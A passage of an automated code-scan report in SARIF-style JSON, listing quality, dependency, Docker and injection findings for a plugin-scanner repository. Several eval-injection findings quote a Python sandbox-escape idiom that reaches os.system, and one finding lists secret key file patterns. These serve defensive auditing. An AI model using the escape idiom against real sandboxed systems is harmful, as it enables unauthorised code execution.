"66821cb4bc1b19ce644d8e7deeb4ad33bb796459b20f5fc7d578e6febb78e8d9", "category": "quality", "severity": "medium", "confidence": 0.95, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "AST-derived cognitive complexity score = 17 (severity threshold for medium: 15+).", "evidence": {"scanner": "repobility-threat-engine", "function": "check_skill_frontmatter", "breakdown": {"if": 8, "for": 1, "except": 1, "continue": 3, "nested_bonus": 4}, "complexity": 17, "correlation_key": "fp|66821cb4bc1b19ce644d8e7deeb4ad33bb796459b20f5fc7d578e6febb78e8d9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/best_practices.py"}, "region": {"startLine": 87}}}]}, {"ruleId": "SEC045", "level": "warning", "message": {"text": "[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data \u2014 even admin-stored data \u2014 is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ cleared) are escapable: attackers use object introspection (().__class__.__mro__[-1].__subclasses__()) to reach os.system. CWE-95 (eval injection)."}, "properties": {"repobilityId": 144982, "scanner": "repobility-threat-engine", "fingerprint": "844e3e4c4ca0619edb1c65f4c69923b7c0fd7e6a241bd6e3313beaaca55d0af2", "category": "injection", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "eval(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC045", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|token|44|sec045"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/code_quality.py"}, "region": {"startLine": 44}}}]}, {"ruleId": "SEC045", "level": "warning", "message": {"text": "[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data \u2014 even admin-stored data \u2014 is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ cleared) are escapable: attackers use object introspection (().__class__.__mro__[-1].__subclasses__()) to reach os.system. CWE-95 (eval injection)."}, "properties": {"repobilityId": 144981, "scanner": "repobility-threat-engine", "fingerprint": "77f8f1802d11e3d0a53a678328984a619ba95d6c4b37a4b0c03ae79a099d8d86", "category": "injection", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": ".exec(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC045", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|token|114|sec045"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/risk-signal-cards.tsx"}, "region": {"startLine": 114}}}]}, {"ruleId": "SEC045", "level": "warning", "message": {"text": "[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data \u2014 even admin-stored data \u2014 is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ cleared) are escapable: attackers use object introspection (().__class__.__mro__[-1].__subclasses__()) to reach os.system. CWE-95 (eval injection)."}, "properties": {"repobilityId": 144980, "scanner": "repobility-threat-engine", "fingerprint": "9a9116f017477d9cb97caf115190a25bc9dd30b0f466fec26159487508c7b5d0", "category": "injection", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "\"eval(", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC045", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|token|78|sec045"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/apps/app-catalog.ts"}, "region": {"startLine": 78}}}]}, {"ruleId": "AGT013", "level": "warning", "message": {"text": "Agent auto-approve or skip-permissions mode is easy to enable"}, "properties": {"repobilityId": 144979, "scanner": "repobility-agent-runtime", "fingerprint": "d9b649bc3942aac1304b7bc02fe37073dbfaaec39391198cfd7cde4d489b5ee9", "category": "quality", "severity": "medium", "confidence": 0.68, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File exposes or configures a broad agent auto-approval mode without enough local guard wording.", "evidence": {"rule_id": "AGT013", "scanner": "repobility-agent-runtime", "references": [], "correlation_key": "fp|d9b649bc3942aac1304b7bc02fe37073dbfaaec39391198cfd7cde4d489b5ee9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/codex-auto-resume-smoke.py"}, "region": {"startLine": 122}}}]}, {"ruleId": "AGT007", "level": "warning", "message": {"text": "localStorage write failures are swallowed silently"}, "properties": {"repobilityId": 144978, "scanner": "repobility-agent-runtime", "fingerprint": "01e4669e7d1d47cada08855faadc3517f741cb45343a4d05074d8b41ff1e29ba", "category": "quality", "severity": "medium", "confidence": 0.8, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "File writes to localStorage and has an empty or ignore-only catch block without QuotaExceededError handling.", "evidence": {"rule_id": "AGT007", "scanner": "repobility-agent-runtime", "references": ["https://developer.mozilla.org/en-US/docs/Web/API/Web_Storage_API"], "correlation_key": "fp|01e4669e7d1d47cada08855faadc3517f741cb45343a4d05074d8b41ff1e29ba"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/approval-center-layout.tsx"}, "region": {"startLine": 213}}}]}, {"ruleId": "DEPCUR-NPM", "level": "warning", "message": {"text": "npm package `@vitejs/plugin-react` is 1 major version(s) behind (^5.0.4 -> 6.0.2)"}, "properties": {"repobilityId": 144976, "scanner": "repobility-dependency-currency", "fingerprint": "a6493e6a91998f651bb22faaa35aeaab3af4ad1c896cb3654f82459ed7ff3e2e", "category": "dependency", "severity": "medium", "confidence": 0.9, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"gap": "1 major version(s) behind", "signal": "currency", "cwe_ids": [], "package": "@vitejs/plugin-react", "scanner": "repobility-dependency-currency", "ecosystem": "npm", "languages": ["javascript"], "latest_version": "6.0.2", "correlation_key": "fp|a6493e6a91998f651bb22faaa35aeaab3af4ad1c896cb3654f82459ed7ff3e2e", "current_version": "^5.0.4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/package.json"}, "region": {"startLine": 1}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144961, "scanner": "repobility-ast-engine", "fingerprint": "db3a1363b10b92d9e857c8a0640bdb912339948f307e8b768f7a7f6fea2f1352", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|db3a1363b10b92d9e857c8a0640bdb912339948f307e8b768f7a7f6fea2f1352"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/approvals.py"}, "region": {"startLine": 266}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144960, "scanner": "repobility-ast-engine", "fingerprint": "cded45bf1b045a960574340b9628a13b6620192d5a6fce1bcbd0ea32ada8a6aa", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|cded45bf1b045a960574340b9628a13b6620192d5a6fce1bcbd0ea32ada8a6aa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/provenance.py"}, "region": {"startLine": 138}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144959, "scanner": "repobility-ast-engine", "fingerprint": "4ea09663072b29517faea96997bb8f78aa4881c3e1ae638c17d52a8d23647529", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4ea09663072b29517faea96997bb8f78aa4881c3e1ae638c17d52a8d23647529"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/provenance.py"}, "region": {"startLine": 90}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144958, "scanner": "repobility-ast-engine", "fingerprint": "9bb5600c46779e341be2ca28178498c7e9b35bfd5cba2a3016385fe18f5cfaef", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9bb5600c46779e341be2ca28178498c7e9b35bfd5cba2a3016385fe18f5cfaef"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/desktop_notifications.py"}, "region": {"startLine": 124}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144957, "scanner": "repobility-ast-engine", "fingerprint": "389c5c0495e78e4cdd583b4abafed4dc04ee394920a59b8fe5710d4050644ce3", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|389c5c0495e78e4cdd583b4abafed4dc04ee394920a59b8fe5710d4050644ce3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/desktop_notifications.py"}, "region": {"startLine": 290}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144956, "scanner": "repobility-ast-engine", "fingerprint": "0509a8001eeb642bc6ab08195ca014c0ca1d1a561e4803569c52a20216031819", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|0509a8001eeb642bc6ab08195ca014c0ca1d1a561e4803569c52a20216031819"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/desktop_notifications.py"}, "region": {"startLine": 202}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144955, "scanner": "repobility-ast-engine", "fingerprint": "1623e22b8dd3cafc3bc798a2c96f3982e841675a1a0167058374062ac097891a", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|1623e22b8dd3cafc3bc798a2c96f3982e841675a1a0167058374062ac097891a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/desktop_notifications.py"}, "region": {"startLine": 140}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144954, "scanner": "repobility-ast-engine", "fingerprint": "321281b02b28898a35e14eef0d89e39adc134a224d2723700833f0eee43ff1da", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|321281b02b28898a35e14eef0d89e39adc134a224d2723700833f0eee43ff1da"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/access_graph_events.py"}, "region": {"startLine": 83}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144953, "scanner": "repobility-ast-engine", "fingerprint": "88bbfd36887c064ad03edd0f7cfb1deb800746f9ca5db195e69ffd5d4d498566", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|88bbfd36887c064ad03edd0f7cfb1deb800746f9ca5db195e69ffd5d4d498566"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 820}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144952, "scanner": "repobility-ast-engine", "fingerprint": "63c1ed14e3b6fbae3c6f25998755a1ea73a1f5e6be75345a484a104b01ade0e6", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|63c1ed14e3b6fbae3c6f25998755a1ea73a1f5e6be75345a484a104b01ade0e6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 683}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144951, "scanner": "repobility-ast-engine", "fingerprint": "ad4701f95e6e59af310ba9b28e17815312c9a0f42d44334b0f8fc9418804db5a", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ad4701f95e6e59af310ba9b28e17815312c9a0f42d44334b0f8fc9418804db5a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 677}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144950, "scanner": "repobility-ast-engine", "fingerprint": "481b4e2aa0cddbbe6b3392ef2dbe4d98edc3ee7c9fea8abde6902ceea7f86cf7", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|481b4e2aa0cddbbe6b3392ef2dbe4d98edc3ee7c9fea8abde6902ceea7f86cf7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 671}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144949, "scanner": "repobility-ast-engine", "fingerprint": "30ceed5222634b9a203f5bd6caa524fd24fb1b8c483cd15fdf0ddd9d7e72c7c7", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|30ceed5222634b9a203f5bd6caa524fd24fb1b8c483cd15fdf0ddd9d7e72c7c7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 665}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144948, "scanner": "repobility-ast-engine", "fingerprint": "6734eb085d410cebd7da9c9cd5f2bdad7fe8feac964bb0c6bbb7fd31720309b1", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|6734eb085d410cebd7da9c9cd5f2bdad7fe8feac964bb0c6bbb7fd31720309b1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 659}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144947, "scanner": "repobility-ast-engine", "fingerprint": "b7c943273a5cad3067d557520d375118abb0a1f9846bf2b66a29eb24b1ee70d5", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b7c943273a5cad3067d557520d375118abb0a1f9846bf2b66a29eb24b1ee70d5"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 498}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144946, "scanner": "repobility-ast-engine", "fingerprint": "b7040b7e2ad0995a34526b35172f879c8380f3e7a38e80bb28c3f11c88edc78b", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b7040b7e2ad0995a34526b35172f879c8380f3e7a38e80bb28c3f11c88edc78b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 487}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144945, "scanner": "repobility-ast-engine", "fingerprint": "75967b67e06fce1cfea6a2d6e0bfa54681561e69625151943821af24b0830863", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|75967b67e06fce1cfea6a2d6e0bfa54681561e69625151943821af24b0830863"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 444}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144944, "scanner": "repobility-ast-engine", "fingerprint": "49e7a830a0acf28387257beebe413fc7d6f7ccff2e4c140345b51296cf8e866d", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|49e7a830a0acf28387257beebe413fc7d6f7ccff2e4c140345b51296cf8e866d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store.py"}, "region": {"startLine": 378}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144942, "scanner": "repobility-ast-engine", "fingerprint": "4e49947f2e30658fab4c4b52a0a58bfb0fa14557156c69dd13f328407077524f", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4e49947f2e30658fab4c4b52a0a58bfb0fa14557156c69dd13f328407077524f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/cli.py"}, "region": {"startLine": 526}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144941, "scanner": "repobility-ast-engine", "fingerprint": "4dda6a54a01060e7c9994601f2c82f4f25a8b9c73f1c82a5e56ed088956fdd04", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4dda6a54a01060e7c9994601f2c82f4f25a8b9c73f1c82a5e56ed088956fdd04"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/verification.py"}, "region": {"startLine": 432}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144917, "scanner": "repobility-ast-engine", "fingerprint": "e4c939e3fb06a6e5d672a34766450f99a85cfa5a734691c0287d1b02e1d6c671", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|e4c939e3fb06a6e5d672a34766450f99a85cfa5a734691c0287d1b02e1d6c671"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_daemon_manager.py"}, "region": {"startLine": 834}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144916, "scanner": "repobility-ast-engine", "fingerprint": "22ff05a817de90a86498d6df40a413fb1adb47ab828ca58537369bd2fa7d1f1f", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|22ff05a817de90a86498d6df40a413fb1adb47ab828ca58537369bd2fa7d1f1f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_daemon_manager.py"}, "region": {"startLine": 827}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144915, "scanner": "repobility-ast-engine", "fingerprint": "2eecb3b426b3ecfab545400882d292f2baba9ea3a9cf83f213194f148b5dddea", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|2eecb3b426b3ecfab545400882d292f2baba9ea3a9cf83f213194f148b5dddea"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_daemon_manager.py"}, "region": {"startLine": 328}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144909, "scanner": "repobility-ast-engine", "fingerprint": "8fbbe839dda266cf4f07c7cbbea29268d29dc05ce07b9e5a0c711988525c58a4", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|8fbbe839dda266cf4f07c7cbbea29268d29dc05ce07b9e5a0c711988525c58a4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime.py"}, "region": {"startLine": 17799}}}]}, {"ruleId": "MINED111", "level": "warning", "message": {"text": "Bare except continues silently"}, "properties": {"repobilityId": 144908, "scanner": "repobility-ast-engine", "fingerprint": "b0719666b2b14d3fc820ef0a9106976e4dbb591b675f007b2e28d22c51e53c4d", "category": "quality", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "bare-except-without-pass", "owasp": null, "cwe_ids": [], "languages": ["python"], "observations_count": 21610}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b0719666b2b14d3fc820ef0a9106976e4dbb591b675f007b2e28d22c51e53c4d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime.py"}, "region": {"startLine": 17489}}}]}, {"ruleId": "CORE_LARGE_FILES", "level": "warning", "message": {"text": "Average file size is 503 lines (recommend <300)"}, "properties": {"repobilityId": 144851, "scanner": "repobility-core", "fingerprint": "b0e66619f97f587fa8444689621ec3c041c9750925ebc075b108749df93bb6c5", "category": "quality", "severity": "medium", "confidence": null, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"rule_id": "CORE_LARGE_FILES", "scanner": "repobility-core", "correlation_key": "fp|b0e66619f97f587fa8444689621ec3c041c9750925ebc075b108749df93bb6c5"}}}, {"ruleId": "DKR012", "level": "note", "message": {"text": "Dockerfile keeps pip download cache"}, "properties": {"repobilityId": 145033, "scanner": "repobility-docker", "fingerprint": "e79e860d9e7f73acaa261b3e478f507b1eb669204892be48b194b33f1d21f494", "category": "docker", "severity": "low", "confidence": 0.72, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "pip install appears without --no-cache-dir.", "evidence": {"rule_id": "DKR012", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/"], "correlation_key": "fp|e79e860d9e7f73acaa261b3e478f507b1eb669204892be48b194b33f1d21f494"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "Dockerfile"}, "region": {"startLine": 11}}}]}, {"ruleId": "DKR008", "level": "note", "message": {"text": ".dockerignore misses sensitive defaults"}, "properties": {"repobilityId": 145032, "scanner": "repobility-docker", "fingerprint": "aea2ad92c68c4ee1f8432bb1ec25e7d45ac12c9e1790ac2d3fffe638b1acce12", "category": "docker", "severity": "low", "confidence": 0.72, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "A Docker build context should exclude secrets and repository metadata.", "evidence": {"rule_id": "DKR008", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/"], "correlation_key": "fp|aea2ad92c68c4ee1f8432bb1ec25e7d45ac12c9e1790ac2d3fffe638b1acce12", "missing_patterns": [".env", "id_rsa", "*.pem", "*.key"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".dockerignore"}, "region": {"startLine": 1}}}]}, {"ruleId": "SEC004", "level": "note", "message": {"text": "[SEC004] SQL Injection Risk: String interpolation in SQL execution. Allows SQL injection."}, "properties": {"repobilityId": 145021, "scanner": "repobility-threat-engine", "fingerprint": "db9edaa7f720046c0e4f8cd553b56891b25e75bf54ff0df07f6d1c356bf06a87", "category": "injection", "severity": "low", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Placeholder variable defined nearby \u2014 likely parameterized query", "evidence": {"match": ".execute(\n        f\"delete", "reason": "Placeholder variable defined nearby \u2014 likely parameterized query", "rule_id": "SEC004", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "code|injection|token|159|sec004"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store_resume.py"}, "region": {"startLine": 159}}}]}, {"ruleId": "COMP001", "level": "note", "message": {"text": "[COMP001] High cognitive complexity: Function `walk` has cognitive complexity 14 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and recursion all weigh in. Breakdown: elif=1, for=2, if=2, nested_bonus=6, recursion=2, ternary=1."}, "properties": {"repobilityId": 144996, "scanner": "repobility-threat-engine", "fingerprint": "7cb427ca5bc1c6565e37cd753bde581d7735e1dbb735f1313e68b67cf42e5964", "category": "quality", "severity": "low", "confidence": 0.95, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "AST-derived cognitive complexity score = 14 (severity threshold for low: 8+).", "evidence": {"scanner": "repobility-threat-engine", "function": "walk", "breakdown": {"if": 2, "for": 2, "elif": 1, "ternary": 1, "recursion": 2, "nested_bonus": 6}, "complexity": 14, "correlation_key": "fp|7cb427ca5bc1c6565e37cd753bde581d7735e1dbb735f1313e68b67cf42e5964"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/claude.py"}, "region": {"startLine": 175}}}]}, {"ruleId": "COMP001", "level": "note", "message": {"text": "[COMP001] High cognitive complexity: Function `check_hooks_and_skills` has cognitive complexity 14 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and recursion all weigh in. Breakdown: continue=1, except=2, for=1, if=4, nested_bonus=5, ternary=1."}, "properties": {"repobilityId": 144995, 